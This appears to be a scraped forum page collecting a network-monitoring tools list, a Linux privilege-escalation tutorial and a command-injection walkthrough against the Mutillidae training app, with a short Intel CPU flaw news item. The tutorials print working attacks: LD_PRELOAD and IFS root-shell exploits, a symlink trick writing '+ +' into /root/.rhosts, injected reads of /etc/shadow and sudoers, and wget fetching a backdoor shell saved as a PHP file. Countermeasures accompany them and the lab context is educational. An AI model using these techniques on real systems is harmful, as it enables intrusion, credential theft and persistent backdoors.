Test Your Knowledge of Apple History
Steve Jobs Said What?
Take the Mac Challenge: How Much Do You Know?
Test Your Computer Chops with Our Macintosh Guru Quiz
Test Your Steve Jobs Fandom: A Quiz
Security & Privacy
How Well Do You Know Your Network Security Terminology? Test Yourself!
Test Your Internet Safety Knowledge
Windows
A Quiz for Microsoft Word Professionals
Are You a Windows Expert? See How Much You Know
Are You an MS Office Expert? Test Your Knowledge
Think You Know Your Windows Computer?
New to Microsoft Word? Find Out How Much You Know!
So You Think You Can Use Microsoft Excel? A General Knowledge Quiz
Test Your Microsoft History Knowledge
Web Development
Are You a Master of CSS? Quiz Yourself and Find Out
How Well Do You Really Know SQL?
-
Awareness of what's happening on your network, and why, makes the difference between average and excellent network administration. Great tools are needed to obtain this knowledge quickly and accurately. Fortunately, some of the best network monitoring tools are free. This article lists the top five.
What Makes a Great Network Monitoring Tool?
Some of the very best Network Monitoring Tools have always been free.
Vendors sometimes even incorporate code based on RRDTool and MRTG into their products. Templates, free utilities, scripting, and a little web code can create a custom monitoring interface that's ideal for you and costs nothing more than the time to put it together.
More advanced and detailed monitoring most often involves SNMP, which can have a steep learning curve for the beginner. Large amounts of data are generated and conted by monitoring tools. Some of this data is essentially invisible until you begin measuring and collecting it.
Commercial tools can "hide" this complexity, which is one reason you might pay for them. The data is there if you're willing to make the effort to obtain it. Transforming it into useful, accurate information is what makes a great monitoring tool.
The Top Five
1. MRTG - The Multi Router Traffic Grapher (MRTG) is primarily designed to monitor and graph traffic on network links. It is written in Perl, generates HTML with PNG image graphs, updated at configurable intervals. One of the best features is that it creates daily, weekly, and monthly graphs as well. You can monitor any SNMP variable you choose. In my opinion, MRTG is one of the best tools ever written for network monitoring.
2. Cacti / RRDTool - Cacti is a front end to RRDTool, and uses a MySQL database for data storage. Data sources can be created and customized. The front end is written in PHP. Many templates are available, as well as the option to grant users permissions to view only or create new graphs.
3. Nagios - Nagios goes beyond network monitoring to include notification and problem management, as well as other enterprise-class features. It has been around for over 10 years, has a large user base and support community. While some of the solutions in the top five are OS agnostic, Nagios runs on Linux or Unix. You can monitor any system or device with it, of course.
4. Ntop - Ntop is focused specifically on network traffic monitoring. IP traffic and protocol information & statistics. Information can be sorted or detailed by host, subnet, or viewed in total for the network. Ntop works with NetFlow and sFlow as well. Interestingly, it can be compiled for Windows as well as Unix.
5. Zenoss Core - If you're looking for an enterprise management platform for more than just the network, but don't have the budget for a commercial product, Zenoss has an open source alternative. Zenoss offers Professional and Enterprise versions with support and consulting available.
Honorable Mentions
SolarWinds Cisco Netflow v5 - This and several other SolarWinds free tools are excellent. If you have a Cisco network with Netflow this can get you started.
Snort - Snort is technically an IDS (and one of the best), but can serve as a great application layer network analysis tool. I didn't include this or any other IDS as they are really a separate category.
Need More?
Advanced monitoring, alerts, and reporting can be built from the tools in free and open source arena, but you or your management may decide that a commercial tool or platform is a better investment. Major network equipment vendors almost always integrate easily with the most common monitoring platforms, or those vendors provide plugins and templates for SNMP data from a wide variety of equipment. Tuning and filtering data, reports, and alerts so that the NOC or helpdesk isn't innundated with redundant or irrelevant data is a big part of integrating a monitoring solution for an enterprise. There are so many possible commercial solutions, and so many ways to implement them, that a "best" choice there is unique for each business, in my experience. Using these free tools, or others that you find, is a great way to augment your knowledge and awareness of the state and health of your network.
Sursa:http://www.brighthub.com/computing/smb-security/articles/35543.aspx
-
Abusing users with '.' in their PATH:
Unfortunately users and sometimes admins are lazy - its human nature to want to avoid taking unnecessary steps, in this case the user would rather type:
$ program
instead of
$ ./program
************
Newbie Note:
Having '.' in your PATH means that the user is able to execute binaries/ scripts from the current directory.
************
To avoid having to enter those two extra characters every time, the user adds '.' to their PATH. This can be an excellent method for an attacker to escalate his/ her privilege, for example:
Joe (the attacker) happens to know that that Suzy has sudo privileges to change users passwords - unfortunately for the admins she also has the power to change the root password. Now Suzy is a lazy girl and thus has '.' in her PATH. Joe places a program called 'ls' in a directory Suzy often visits. This 'ls' program contains code to modify root's password. Now when Suzy enters that directory and asks for a listing, because she has '.' in her path, the 'ls' that Joe placed in the directory is run, instead of /bin/ls. Now root's password has been changed, and Joe is able to logon as root.
Having '.' in your PATH can also help the attacker if exploiting programs that make system(), execvp(), or execlp() calls to programs, if they do not specify the full path to the program the attacker can place a program into a directory in the PATH, so that program is run instead - this works because programmers just expect that the program they mean to run will be in the PATH.
************
Newbie Note:
To add '.' to your path type this at the prompt PATH=.:${PATH} then to be able to use the '.' in your path enter export PATH.
************
************
Countermeasures:
1) Do not include '.' in your path!
2) Place the following at the end of your .bashrc or .profile - This will remove all occurrences of '.' in your PATH.
PATH=`echo $PATH | sed -e 's/::/:/g; s/:.:/:/g; s/:.$//; s/^://'`
************
Shell Escape Sequences:
Many programs offer escape sequences to display a shell to the user, programs such as
- emacs - by entering alt+!
- vi - by entering :![commandname]
- man - by entering![command name] replacing [command name] with the program you wish to run.
- Old Linux games - that incorporate a TBIC (the boss is coming) feature to escape to a shell.
If you are able to use an escape sequence on a program that has suid bit set you will be given the privileges of the owner of the file. Escape sequences can help an attacker greatly, because they are so easy - although you will rarely find an escape sequence nowadays that will elevate your privilege to that of root. Try using different ctrl+[character] combinations to try and find escape sequences. For example - say that a text file had the suid bit set, and the user opened it up in vi, they could then enter :!/bin/bash, and they are given a suid root shell!
************
Countermeasures:
1) Remove any suid games, or files that could easily be exploitable by shell escape sequences. To find all suid files on your system use the following command:
find / -type f -perm -4000
************
IFS Exploit:
The IFS exploit is pretty straight forward, although to the beginner it may seem a tad confusing. The IFS (or Internal Field Separator) is used to separate words/ arguments etc. In the English language we use the ' ' (space) character to seperate arguments from their commands.
With an IFS set to ' ' (space) the command "ls -al" has the space between 'ls' and '-al' to separate the command to its argument.
With an IFS set to ';' (semicolon) the command "ls;-al" will have the same effect as "ls -al", because we have said we wish to use the ';' instead of the space. So it uses a ';' to separate the command from its argument.
A hacker can make practical use of the IFS to escalate his/ her privilege. For example: Lets say that at every logon a suid program (/usr/bin/date) executes /bin/date and displays the output on screen. An attacker can take advantage of this by doing the following (I will explain the workings of the privilege elevation after, I have numbered the lines to make the explanation easier) (the '$' is the symbol for a standard command prompt, and the '#' is symbol for the root command prompt).
1) $ cat /home/nick/bin
2) ...#!/bin/bash
3) .../bin/sh #this script will execute /bin/sh
4) $ ls -al /usr/local/date
5) ---s--x--x 1 root root 21673 Mar 9 18:36 date
6) $ PATH=/home/nick:${PATH}
7) $ export PATH
8) $ IFS=/
9) $ export IFS
10) $ /usr/local/date
11) # whoami
12) root
I will now explain the above in detail:
Lines 1, 2, 3: the attacker creates a simple bash script that runs /bin/sh when executed.
Lines 4 and 5: the attacker checks the permissions for the suid program that calls /bin/date.
Lines 6 and 7: adds '/home/nick' to his PATH (where the 'bin' program is he wrote earlier).
Lines 8 and 9: He sets the IFS to '/' this means that instead of using a space, the '/' will be used, this
means that the program instead of calling '/bin/date' will call 'bin date', because he has placed a
program called 'bin' in the home directory (which is now in the PATH) when /usr/local/date is executed
it will execute /home/nick/bin with the permissions of /usr/local/date - which means the
attacker will get a root shell!
Lines 11, 12: The attacker runs 'whoami' to verify that he is root, line 12 confirms this.
************
Countermeasures: An easy way of attempting to stop IFS exploits, is to not allow users to execute any type of executable or suid programs in places that the users can write to. Directories such as /home/[username] and /tmp allow the user write permissions, this means that they can create programs then run them from the location. If directories such as /home and /tmp are on their own partitions you can disallow users to run suid programs or any executables for that matter by adding the correct options to /etc/fstab. You can do this by replacing a line similar to this:
/dev/hda6 /tmp ext3 defaults 0 0
with this:
/dev/hda6 /tmp ext3 nosuid,noexec 0 0
This type of countermeasure is not only useful to stop IFS attacks - but pretty much all attacks concerned with privilege escalation discussed in this manual
************
LD_PRELOAD Exploit:
This attack involves .so files (part of the dynamic link library) being used by programs. The attacker can add a program pretending to be one of these libraries so that when a program is run it will execute the program pretending to be a library, this is useful if you are calling a program that has the suid bit set to root, this. So when the program is first run, it will attempt to load the library it requires (but it has been replaced with code the attacker wants executed) and thus runs the commands in the program placed by the attacker, with the permissions of the owner of the calling program. A full example of this is demonstrated below:
1) $ cat me-root.c
2)
...#include <stdio.h>
3)
...#include <unistd.h>
4)
...main()
5)
...{
6)
......setuid(0);
7)
......setgid(0);
8)
......printf("Congratulations you are root!");
9)
...}
10) $ gcc -o me-root me-root.c
11) $ ls -l me-root.c
12) ---s--x--x 1 root root 4365 Mar 16 14:05 me-root.c
13) $ cat me-root_so.c
14)
...void printf(char *str)
15)
...{
16)
......execl("/bin/sh","sh",0);
17)
...}
18) $ gcc -shared -o me-root_so.so me-root_so.c
19) & LD_PRELOAD=./me-root_so.so
20) $ export LD_PRELOAD
21) $ ./me-root
22) # whoami
23) root
I will explain the above attack in detail:
Lines 1 to 9: The attacker creates a simple C program that runs gives sets the userid and groupid to 0 (root).
Line 10: The attacker compiles the program created above and calls it me-root.
Lines 11 & 12: The attacker checks the file permissions on the me-root program.
Lines 13 to 17: The attacker creates the program that will pretend to be part of a library, it executes /bin/bash.
Line 18: The attacker compiles the pretend library program as a shared library and calls it me-root_so.so.
Lines 19 & 20: The attacker adds me-root_so.so, and exports LD_PRELOAD, so now when me-root is run it will execute the program
me-root_so.so (pretending to be a library) with the permissions of me-root (in this case the permissions of userid 0 - which is the root account!).
Line 21: The attacker runs the me-root program.
Lines 22 & 23: The attacker verifies who s/he is, line 23 confirms s/he is root.
Symlinks:
Symlinks or symbolic links are a very useful tool in Linux. They allow us to make a "shortcut" (in windows terms) to a file or folder. For example
ln -s /etc/passwd /tmp/passwd_file
This creates a link called /tmp/passwd_file to /etc/passwd, so now whenever /tmp/passwd_file is opened it will open /etc/passwd. Although symlinks can be infinately useful, they are quite easily exploitable. Lets say for example Joe attacker is feeling particularly sneaky, Joe knows root uses '.' in his path, and that all users can post technical problems to the admin into a directory /usr/problems/. The attack is below, and the full description will follow:
1) $ ln -s /root/.rhosts /tmp/root-rhost
2) $ stat /tmp/root-rhost
3) ...stat: cannot stat /tmp/root-rhost
4) $ cat /usr/problems/ls
5) ...#!/bin/bash
6) ...if [ ! -e /tmp/root-rhost ] ; then
7) ......echo "+ +" >>/tmp/root-rhost
8) ...fi
I will explain the above attack in detail:
Lines 1, 2 & 3: The attacker creates symbolic link from /tmp/root-rhost to /root/.rhosts, and uses stat to see if the file existed, the output on line three indicates that /root/.rhosts does not exist (the admin removed /root/.rhosts because he saw this file as a security threat - this is what Joe wants)
Line 4 to 8: He then creates a bash script called ls (which will be run instead of /bin/ls, because '.' is in his path first, when he wants to list the contents of /usr/problems/). This program tests if /tmp/root-rhost exists, because it is a symbolic link pointing to /root/.rhosts (which does not exist) it will return that /root/.rhosts does not exist, so it will then echo "+ +" into /tmp/root-rhost, which will be forwarded into the file /root/.rhosts! This will mean that root will have a passwordless login over any login that supports and allows rhosts authentication (e.g. rlogin and ssh). The trap is now set, he just has to wait!
Cron jobs with symlinks can also be used to an attackers advantage, for example:
The 'sales' group in businesscorp.com have a folder to post their documents for the whole group to read and write to, unfortunately the users keep forgetting to add group write permissions to their documents, so the admin developed a script that will change the files in the sales folder to the group sales, and set group writeable permissions, this script is run periodically through a cron job, the script looks like the below.
1) #!/bin/bash
2) chgrp -R sales /usr/export/sales
3) chmod -R g+w /usr/export/sales
If someone sneaky in sales decided to make two symlinks to /etc/passwd and /etc/shadow, the cron job would follow the symlinks and set write permissions for the group sales on /etc/passwd and /etc/shadow. From here the attacker can change any password s/he wants.
Sursa:Privilage Escalation
-
Command injection or also known as Remote Code Execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the website’s hosting server. Thus making it another common web application vulnerability that allows an attacker to execute arbitrary codes in the system. In fact it is included in OWASP (Open Web Application Security Project) Top Ten Web Application Security Risks.
Let us take a look at the image shown above which happens to be our target and example for today. It shows a simple user-interface for querying the DNS (Domain Name System) by inserting any Internet Protocol address or host name at the dialog box. Now let us look at the sample vulnerable code for command execution or injection:
?
<?php
if (isset($_POST["dns-lookup-php-submit-button"])){
try{
if ($targethost_validated){
echo ‘<p class=”report-header”>Results for ‘.$lTargetHostText.’<p>’;
echo ‘<pre class=”report-header” style=”text-align:left;”>’;
echo shell_exec(“nslookup ” . $targethost);
echo ‘<pre>’;
$LogHandler->writeToLog($conn, “Executed operating system command: nslookup ” . $lTargetHostText);
}else{
echo ‘<script>document.getElementById(“id-bad-cred-tr”).style.display=”"</script>’;
}// end if ($targethost_validated){
}catch(Exception $e){
echo $CustomErrorHandler->FormatError($e, “Input: ” . $targethost);
}// end try
}// end if (isset($_POST))
?>I got the code above from the dns-lookup.php file of a free and open source vulnerable web application that I have been playing at which is Mutillidae from Irongeek.com and developed by Adrian “Irongeek” Crenshaw and Jeremy Druin. Mutillidae is web application for you to practice your Web Fu skills like sql injection, cross site scripting, html injection, javascript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more. It is packed with vulnerable pages, hints and walk-through in case you don’t have an idea on how the exploit is done. I decided to use this web application so that you could also try out this tutorial or writeup.
Okay, now let’s try to query for a random IP address which is 74.125.31.102.
Did you guys notice that there is a code echo shell_exec() function on the script? If you look closely on the code, you should be able to see shell_exec(“nslookup ” . $targethost); on it. With nslookup command, a user can to look up an IP address of a domain or host on a network. Linux uses “&&” to link commands and “;” as a command separator. Now, let’s try the command echo but I prefer using the | (vertical bar) instead of && to check if it is vulnerable to command injection:
| echo ‘hello’
In this case the target is vulnerable to command injection or execution. It’s just like issuing the command nslookup | echo ‘hello’ in the terminal.
But what’s the reason why I prefer using the pipeline or vertical bar rather than ‘&&’? Well this image should enlighten you up:
The vertical bar tells the shell to provide the output of the command on the right, this is called a pipeline while the ‘&&’ links the commands nslookup and uname -a which outputs the DNS of the IP address and the kernel version of the host. In some cases, && just doesn’t work and sometimes you need to put a value on before the pipleline just like: 1 | echo ‘Infosec Institute’.
But so much for that, let’s continue on gathering some information on the webserver. And because we used the command uname -a, we were able to identify that information on the system like it runs on Linux kernel release 3.0.0-16, network node hostname is projectX, the operating system is GNU/Linux, etc. . Now let’s probe or check what Linux distribution this server is:
| cat /etc/issue
?| cat /etc/*-release
?| cat /etc/lsb-release
| cat /etc/redhat-release
(for rpm based distros)Hey it’s BackBox Linux which is one of my favorite penetration testing distros based on Ubuntu.
Time to figure out where are we now and list all the directories:
| pwd ; ls -la
As an information gatherer, it is our task to check what services are running and which service belongs to a specific user privilege:
| ?ps aux
| ps -ef
| top
| cat /etc/serviceAttackers may also check if there are any settings that are mis-configured or some logs to check if anything can be exploited or if there are vulnerable plugins attached. Below are other commands for specific directories and are used in probing the web server:
| cat /etc/environment
| cat /proc/self/environ
| cat /etc/shadow
| cat /etc/sudoers
| cat /etc/group
| cat ?/etc/security/group
| cat /etc/security/passwd
| cat /etc/security/user
| cat /etc/security/environ
| cat /etc/security/limits
| cat /usr/lib/security/mkuser.default
| cat /var/log/messages
| cat var/log/mysql.log
| cat /var/log/user.log
| cat /var/www/logs/error_log
?| cat /etc/syslog.conf
| cat /etc/chttp.conf
| cat /etc/lighttpd.conf
| cat /etc/cups/cupsd.conf
| cat /etc/inetd.conf
| cat /etc/apache2/apache2.conf
| cat/var/log/apache2/error.log
| cat /etc/my.conf
| cat /etc/httpd/conf/httpd.conf
| cat /opt/lampp/etc/httpd.conf
| ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/
?| cat /etc/resolv.conf
| cat /etc/sysconfig/network
| cat /etc/networks
?| /sbin/ifconfig -a
| cat /etc/network/interfaces
?| s -alh /var/spool/cron
| ls -al /etc/ | grep cron
| ls -al /etc/cron*
| cat /etc/cron*
| cat /etc/at.allow
| cat /etc/at.deny
| cat /etc/cron.allow
| cat /etc/cron.deny
| cat /etc/crontab
| cat /etc/anacrontab
| cat /var/spool/cron/crontabs/rootWith most attackers interested in backdooring a Linux webserver, they need to probe first ? try to how files can be uploaded so that they can deliver the finishing touch.
?| find / -name wget
| find / -name nc*
| find / -name netcat*
| find / -name tftp*
| find / -name ftpI think I’ll try wget then, so I just need to try and download a text file from a certain URL I found in Google Search Engine.
?| wget http://whateversite.com/hackers/resources/digital%20rebels/articles/unixhck.txt
Wget command allows non-interactive download of files from the Web and it supports HTTP, HTTPS, and FTP protocols.
Let’s try to check if the file is really uploaded by typing these commands:
| ls -la
| cat unixhck.txtGreat, now I have downloaded a textfile of Sir Hackalot’s tutorial about Unix Hacking to the web server. Now let’s try to upload a backdoor shell in a text file. In this example I will be using a r57 Backdoor Shell from another source.
| wget http://whateversite.com/backdoor.txt
Now let’s make a php backdoor shell by copying the contents of backdoor.txt to newfilename.php (I’ll just make a new backdoor.php file).
| cp backdoor.txt backdoor.php
?Now time to check the backdoor shell.
Most backdoor shells have shell_exec() function too that’s why you can execute commands on it easier. Because it allows you command execution then attackers may also use it for running their malicious scripts like IRC Bots, Scanners, mass ssh scanners, bruteforcers, etc.
For example:
perl udp.pl
./a 124.104
perl wetwork.pl
perl timthumbexploiter.pl
python bot.pyTips for Preventing Remote Code Execution:
1. Disable the shell_exec () function if you plan not to use such function to prevent ?arbitrary code execution or if you just wan’t to get rid of this security risk.
2. But if you really need the shell_exec () function for a certain php file or form, then use escapeshellarg () function which escapes shell metacharacters and escapeshellcmd() function which is used to escape single arguments to shell functions coming from user input. Both of these functions escapes potentially dangerous characters in the string.
3. Adding a WAF or web application firewall could also help although I cannot guarantee 100 percent security since some WAF’s can still be bypassed but at least there are some preventions. It also depends on the lockdown. But I prefer using ModSecurity for hardening your Apache Web Server in Linux/Unix because it is an open source web application firewall which helps you to detect and prevent common attacks against web applications like SQL Injection, XSS, Command Injection or Execution, etc.
And so I decided to share a simple guide for installing ModSecurity just in case you wanna try it out.
Setting up ModSecurity in your Web Sever running Ubuntu and Debian Based Distros:
1. Type this in your terminal emulator : ?sudo apt-get install libapache2-modsecurity
This should install new pagkages for libapache2-modsecurity and modsecurity-crs
2. Create a directory for ModSecurity in the Apache2 folder:
sudo mkdir /etc/apache2/modsecurity
3. Create a configuration file for ModSecurity, which will be loaded by Apache, using this command: ?sudo nano /etc/apache2/conf.d/modsecurity.conf
?
Add the following code, save and exit. (Ctrl +X, Type Y for to agree or say yes to the changes of the file, then press Enter to save)
## /etc/init.d/apache2/conf.d/modsecurity.conf
Include modsecurity/*.conf
4. Set the ModSecurity rules using these two commands:
?cd /etc/apache2/modsecurity
sudo cp -R /usr/share/modsecurity-crs/base_rules/* .
5. ?Modify and correct the line in the modsecurity_crs_20_protocol_violations.conf file:
sudo nano /etc/apache2/modsecurity/modsecurity_crs_20_protocol_violations.conf
?Replace this line:
SecRule REQBODY_ERROR “!@eq 0?
with this one:
SecRule REQBODY_PROCESSOR_ERROR “!@eq 0?
Then Save and exit.
?6. Restart now the Apache web server.
sudo service mysql start
7. To verify if the ModSecurity module is loaded in the Apache type this command:
cat /var/log/apache2/error.log | grep modsecurity
The output should look like this if configured properly
ModSecurity for Apache/2.6.0 (URL) configured.
There are still other configurations in ModSecurity for extra added protection so you might wanna visit their official website at ModSecurity: Open Source Web Application Firewall
Additional Reading Materials:
-
-
-
Intel CPU Vulnerability can provide control of your system to attacker
The U.S. Computer Emergency Readiness Team (US-CERT) has disclosed a flaw in Intel chips that could allow hackers to gain control of Windows and other operating systems.
The flaw has already been exploited on 64-bit versions of Microsoft Windows 7, FreeBSD, NetBSD and there’s a chance Apple’s OS X may also be vulnerable.
The flaw was disclosed the vulnerability in a security advisory released this week. Attackers could execute malicious code via kernel privileges or launch a local privilege escalation attack.
VMware's virtualization software is not affected, and neither are AMD's processors, as they do not use the SYSRET instruction whose incorrect handling causes the flaw or handle it differently.Many of the affected vendors have already pushed out an update that defuses the flaw.
However, it said that while 32-bit operating systems are safe, "Intel CPUs that use the Intel 64 extension need the security patches released by Microsoft in their MS12-042 security bulletin."
Source:Intel CPU Vulnerability can provide control of your system to attacker | The Hacker News
-
How To Use Foca
in Tutoriale video
Posted